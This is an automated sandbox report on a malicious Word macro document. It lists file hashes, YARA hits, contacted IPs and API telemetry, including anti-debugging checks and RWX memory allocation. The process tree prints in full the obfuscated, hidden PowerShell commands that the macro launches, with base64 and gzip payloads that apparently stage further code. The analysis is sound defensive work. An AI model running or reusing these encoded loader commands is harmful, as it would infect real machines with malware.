Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	Sept. 9, 2021, 9:07 p.m.	Sept. 9, 2021, 9:09 p.m.

Size	85.0KB
Type	Composite Document File V2 Document, Little Endian, Os: MacOS, Version 5.11, Code page: 10000, Author: Bryam Lima Aquiles, Template: Normal.dotm, Last Saved By: Bryam Lima Aquiles, Revision Number: 3, Name of Creating Application: Microsoft Office Word, Total Editing Time: 25:00, Create Time/Date: Tue Sep 7 22:10:00 2021, Last Saved Time/Date: Tue Sep 7 22:53:00 2021, Number of Pages: 1, Number of Words: 98, Number of Characters: 532, Security: 0
MD5	`a02cfacbf32e9ff66464de27faa58543`
SHA256	`848de91c16469e9f09e284adbbbf8cf317db916b414240c6bd46364a8f4c2c84`
CRC32	`C32BE859`
ssdeep	`1536:6cffffffgffffffd7fffffG9fffffFEffffffurfffYyCwtvLRD4nKmGI+xwtImr:6cffffffgffffffd7fffffSfffffOffx`
Yara	Antivirus - Contains references to security software Microsoft_Office_File_Zero - Microsoft Office File Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office15\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\detalhes_atualizacao.doc
2484
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBBAFAAdABOADIARQBDAEEANwBWAFcAYQBXAC8AYgBPAEIARAA5AG4AQQBEADUARAAwAEoAaABRAEIATABxAFcAUABMAFIASQB3AEUASwBMAEMAVwBmAHIAUQAvAFoAUwBuAHoAVwBLAEIAaQBKAGwAaABoAFQAbwBpAHQAUgBjAFoAeAB1AC8ALwBzAE8AYgBUAGwATgB0ADIAbgBSAEwAcgBDAEMARAAzAEkANABNADUAeAA1ADgAegBqAFUASwBvAHMAOQBRAFgAbQBzADQASQBIAHkANQBlAHoAMAB4AE0ARQBKAGoAaABTAHQANABOADgAWABsAGMASgB0AFIAKwBnAG4ASgB5AEEAdABCAEsAKwBWAGQANABxADIAUQBKAHQATgBuAFUAZQBZAHgAcwB2AEwAUwB6AHQATABFAGgASwBMAHcANwB6AFUASQBnAEsAbABLAFkAbAB1AEcAQwBXAHAAcABpAHQALwBLADUATwBRAEoATwBSADgAYwBIAE4ATABQAEsARgA4AFUAUQBxAGYAUwBpADMARwBiAHoARABMADEAWABZADIAOQBrAEsAaQBuAEsAUABZAGwAMgB0AGQANwBtAEUAWgBSADgAbgBkAE0AQwBvADAAOQBlAE4ASABWAFYAKwBjAGwANQBlAGwAeAB1AGMATQBzADEAUgBUADMAVgAwAHEAUwBGAFQAeQBHAFYATgAxADUAYQBzAHUATgA3AHoAYQBiAFkAaQBtADkAcQBpAFgAOABKAFMAdgBSAEcAbABDADQAMgBxAGwAZABCADIAbgBlAEUAWAA2ADQATwAyAE8AOQBJAGcASQB1AFoAKwBxAE8AdQBRAEEAbgA0AFMASQBMAEkAawBWAHkARQBhAGEASAB4AFkAMQBGAFkAWgBPAHcAagAzAGsAKwB3AGwASgBVADcAVwBvAEwASwBUAGoAeABYAEwANQBsADcAYgBJAGQAeAAxAGwAcwBhAEEAUgBLAFgAVgBpAFEAUgBLACsAYwBVAGwAeQBSAHoAMgBTAGwAdABvADQAOQBoAGsAWgBrAGQAVQBTAHIARgB5AFIAMABEAGgAWQA2AGoAcQBvADMAZgBFADEAMABRAHAAeAB4AGwAaABSACsAUgBNADMAVwBwADkAcwBqADUAagA5AHIAcABIADIAMQBBAGkAMABIAEoASABvAFIAUwBqAGgARAAxAG4AMgB1AEoAOAB4AGMAcgBCAFQAbgB3AGsAVABpAHEANwBEAGsAeABjAGUATQBQAHQANgBkAG4AcAAyAHUAbgBwAGsAeQBLAHUAbgBEAEkASABSAHkAVwBJAC8ASgBoAEMAWAA1AHYAQwBVADcAcgBYAGUASwBXAFoAUgA2AGMARQBlAFcAUABCAGsAQgA5AFAAQwBWAFoASQBSAGYAZgBtAEkAcQBsAEkAZwBaAHEALwA0AGMALwBQAHkAVQBSAGMAMABIADIANQBBAHMAQgBoAHoANgBpAC8AQgBJAEsAOQBpAHcAVgA5AC8AawB1AEsAZgBrADcARgBPAFYAagBRAG0AOQBWADIATQBJACsAbwBkACsAYQBZADkAaAB5ADEAWgBNAGIATABQAHIAbgBSAFUANgAwAE4ARQBtAHAAbwB2AEUATAA5AE8ARwBBAG0AdwBrAEgAagBKAEUAdgA5AGcAMQBvAGkAbwBlAEwAUwAxAE0AcwBwADgAawBpAEEAUAA2AHAATgBDAFYARgBBADYALwBmAHQAZwBEAGkAWABRADEARQA3AGMASQB4AEgAZwBjADUAZwBEADUAdwBvAHIAWQBEAGsANQBhAHUAZgBNADMAaAAxADMAbAAzAE4AUQBVAG0AMgBHADAANwBTAG8ATwBCAGsAYwBNADYAKwBvAHUAQQBRAHoANABoAGMAVgBGAEsAYwAwAFgAMABLAFoANABQAHUAaAArAGkAMwBjAFgAcwBZAEUAOQBYAEEAcQBqAHUANgBXAGUAZwA1AGoAdgBwADMATgA0ADEAUQBrAG0AUQBjAFYAZwA5AFMAdgAzAEEAMwB4AEsARwBZAFMAaQBhAEwAUwBwAGoANgB4AGQAaQA0AE4AagB0AHUAcQB6ACsASgBnAFkAOABhAEEALwBlAEQAcABEAHUAbwBBAEUAcABtAC8ASwB5AFEAUABFAG8AaABRADEAbAB3AHYAdQBVAFIAMABvAGcAMABqAEUAYQBqAHMAVAAzAHUAVAA0AFEARABPAGQAawA3AHgAUABXADkAdwBRAEgAegAxAFgALwBFAGQATwBYAHcAZwByAEEAVABpAGkATQBDAFQANgBLAEMANgBMAHUATwBpAHEASQB4AHAASQBxAEIAbgBTAEYAQQBmAGIAdgA3AFQAMQBrADkAYQBoAFEAegBDAFQAawBoAGUAQQArADEANABLAEIAYgBXAFQAawBnAHkARgB6AGcAbQBEAFUAdQB5AE0AWQBkAGsARAAwAEEAaQBJAFAAbABtAHcAaQBNAEwAcAArAFIAMQA3AGQAQQBZAHQAQgBmAEcAZwBEAG8ASQBuAGwAbQA5ADcAVgBJAHkAWAB0AE4AeQBaAHcAdgBmAEgAbgB5AHYAZQA2AHUAWABYAFkAOABHAGoAagBCADUAMQBQAFAAcwAxAEcAawAxADMAeQBLADYARABiAGIAZQAyAHoANwB5AC8AUABjACsAdQBYAEQASABOAGUARQAyAE8AcwBKADIAVQBIAHQASQBUAGEAcwBXAGUAcABaADUASgBjAGYAbABJAEUAQgArAEgAMgBUAEIATABQAFMAWQA2AFQAVABXADkAMABZAHQATgBlAG0AMgBQAFoARwArAEQAagA2ADgAVwBxADAAOQBOAFYARwAxAFcAaAB0AFUAegBUAFgAQQBOAGcATwA3AE4AZABoAEYAZABIAHYAZgBoAFQARgAwAHcARQBIAFgANgBxAFMAVwAyAFcARwBOADkALwBiAG8AWgBsAEoAcAB6AGkAZQBzAGIAZABTAGEANABXAHIAQwBVAC8AZgAxAHIARwA0AFkAeABvAFcAUAA2ADcAMABkAFEAaABiADMAcQA3ADMAZAB0AEQAegBpAFYAMgAwAHYAcwBtAG8AeABOAHkANwBzADIAaABvADEARQBMAEwAagB4AHIAaABwADgAUQA4AHoASwAwAEcATwBNAGMAYgBCAGgAcQBlADMAYgA2AHIAWgBKAEwAQwBSAFAAYgBBAHAAbQBRACsAdgBtADkAWgB3ADIATABUAFEAZABlAHYAMgBjAC8AMwBDAEMASQB5AEwAeQBSAFMASAAxAG0AUgBjAG8AZgBQAE4AZABCAFQAQwB2AEwAbAB0AEQAegA4AFkAWgBxADMAagBrAHcAYwArADMAdwBKAHcATABZADUAdwBNAEEASwBkAHcASwA1ADQANABRAHAAMAA2AGkAKwBSADkAYgBMAFAAMAB3AHAAZQBXAHgAeABaAG8ATgBPAGMAZgAwAGEAdABjAEwAWgBwAE8AZwB6AFcAcgA2ADQAcgBIAEkAMQBaAGYANABwAFIAZAA3ADUAcgBHAGsAWgA1ADUAdABSAFEAMgArAFMAVABWAG8AQwBHAG8ASQA0AEQAYQA0AGgAUgBlAGwAZAAvAHEAQgB2AGwAcwBjAC8AOQB5AGEAdgArAGIARwBXAE0AcAArAHkATgBVAGIAZQBIAFQAagBpAFYATwBSAHUAYgBTAFAANQB1ADIALwBVAFAAMwByAHkAOAA5AFEAWgB2ADMAbgBZAG4AZABCAHgAeABkAEcAMABZADQAeABlAFMATQAwAEMAYQB3AHEAWQB1AFIAdAA0AFQATQB2AHkAcwBkAGYAZAB3AGsAbwBhAFkAQQBVAG0AZwBLAHgAOABQAFoAWgBNAG4AegBiAHoAVgBPAHAAeABLAEMAMAAyAEQAUwAzAGwATgBrAHAAZwB3AHUATgBmAGcANQBqAHQAUwBHAHoASABHAFAAZABuAGoAbwBTAFgARAA3AFgATABvACsAZgBJAEsAdQBvAFoAaAB0AGYATABzAFMARgBjAGUARgBmAFYAdgB2AGYAOABvAHUAcgB5AGMAUQA0AFIAdwBXAFAAWgA4AEwAbgBWAEoASABJAGkAdwBhAE4ANQBYAFQAUgBQAGEAdQBYAGwAZgBNAHkASABIADMAMAAvAEwANQBwAHUAZABkAHYAQgBWAGwAUABmAEIAQQBaAGwASAA5ADIAegB2AFgAcABjAEgAcQBjAEQAOAB2AHYAVgAvAFEAcABZAGYAMwBoAEQAKwAvAEYAOQBEADkAawAzADIAaQA5AFgAZgBnAHQARQBzADUAZwBuAC8ASQBQADkAZQA4AEUAZQBZAC8AbQBIAGUARQAwAHcARgA2AEwAbgBRAGUAUgBnADUAMwBIAHIAUABwAFoAKwBUADQAOABuAGIAZwBDAHcASQBWAEgANgBWAFAALwBKAFYAYgBwAEMASgA4AHoANgA4AEoASgB5AGQALwBnAE0AQgBTADkAOQBHAEwAdwBvAEEAQQBBAD0APQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
  2208
  - powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String('H4sIAAPtN2ECA7VWaW/bOBD9nAD5D0JhQBLqWPLRIwEKLCWfrQ/ZSnzWKBiJlhhToitRcZxu//sObTlNt2nRLrCCD3I4M5x58zjUKos9QXms4IHy5ez0xMEJjhSt4N8XlcJtR+gnJyAtBK+Vd4q2QJtNnUeYxsvLSztLEhKLw7zUIgKlKYluGCWppit/K5OQJOR8cHNLPKF8UQqfSi3GbzDL1XY29kKinKPYl2td7mEZR8ndMCo09eNHVV+cl5elxucMs1RT3V0qSFTyGVN15asuN7zabYim9qiX8JSvRGlC42qldB2neEX64O2O9IgIuZ+qOuQAn4SILIkVyEaaHxY1FYZOwj3k+wlJU7WoLKTjxXL5l7bIdx1lsaARKXViQRK+cUlyRz2Slto49hkZkdUSrFyR0DhY6jqo3fE10QpxxlhR+RM3Wp9sj5j9rpH21Ai0HJHoRSjhD1n2uJ8xcrBTnwkTiq7DkxceMPt6dnp2unpkyKunDIHRyWI/JhCX5vCU7rXeKWZR6cEeWPBkB9PCVZIRffmIqlIgZq/4c/PyURc0H25AsBhz6i/BIK9iwV9/kuKfk7FOVjQm9V2MI+od+aY9hy1ZMbLPrnRU60NEmpovEL9OGAmwkHjJEv9g1oioeLS1Msp8kiAP6pNCVFA6/ftgDiXQ1E7cIxHgc5gD5worYDk5aufM3h13l3NQUm2G07SoOBkcM6+ouAQz4hcVFKc0X0KZ4Puh+i3cXsYE9XAqju6Weg5jvp3N41QkmQcVg9Sv3A3xKGYSiaLSpj6xdi4Njtuqz+JgY8aA/eDpDuoAEpm/KyQPEohQ1lwvuUR0og0jEajsT3uT4QDOdk7xPW9wQHz1X/EdOXwgrATiiMCT6KC6LuOiqIxpIqBnSFAfbv7T1k9ahQzCTkheA+14KBbWTkgyFzgmDUuyMYdkD0AiIPlmwiMLp+R17dAYtBfGgDoInlm97VIyXtNyZwvfHnyve6uXXY8GjjB51PPs1Gk13yK6Dbbe2z7y/Pc+uXDHNeE2OsJ2UHtITasWepZ5JcflIEB+H2TBLPSY6TTW90YtNem2PZG+Dj68Wq09NVG1WhtUzTXANgO7NdhFdHvfhTF0wEHX6qSW2WGN9/boZlJpziesbdSa4WrCU/f1rG4YxoWP670dQhb3q73dtDziV20vsmoxNy7s2ho1ELLjxrhp8Q8zK0GOMcbBhqe3b6rZJLCRPbApmQ+vm9Zw2LTQdev2c/3CCIyLyRSH1mRcofPNdBTCvLltDz8YZq3jkwc+3wJwLY5wMAKdwK544Qp06i+R9bLP0wpeWxxZoNOcf0atcLZpOgzWr64rHI1Zf4pRd75rGkZ55tRQ2+STVoCGoI4Da4hReld/qBvlsc/9yav+bGWMp+yNUbeHTjiVORubSP5u2/UP3ry89QZv3nYndBxxdG0Y4xeSM0CawqYuRt4TMvysdfdwkoaYAUmgKx8PZZMnzbzVOpxKC02DS3lNkpgwuNfg5jtSGzHGPdnjoSXD7XLo+fIKuoZhtfLsSFceFfVvvf8ourycQ4RwWPZ8LnVJHIiwaN5XTRPauXlfMyHH30/L5puddvBVlPfBAZlH92zvXpcHqcD8vvV/QpYf3hD+/F9D9k32i9XfgtEs5gn/IP9e8EeY/mHeE0wF6LnQeRg53HrPpZ+T48nbgCwIVH6VP/JVbpCJ8z68JJyd/gMBS99GLwoAAA=='))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))
    2960

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
178.62.247.185	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (12 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 9, 2021, 9:07 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 9, 2021, 9:07 p.m.			0	0
IsDebuggerPresent Sept. 9, 2021, 9:07 p.m.			0	0

Uses Windows APIs to generate a cryptographic key (50 out of 80 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4508 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4888 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4d48 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4848 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4c08 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c4488 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c5108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c5108 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a51f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a5338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a5338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a5338 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a4b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a4b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a4b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a4b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a4b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 9, 2021, 9:07 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x003a4b38 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 9, 2021, 9:07 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 289 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a85d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x6a46e000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 9, 2021, 9:07 p.m.	process_identifier: 2484 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x04a58000 process_handle: 0xffffffff	1
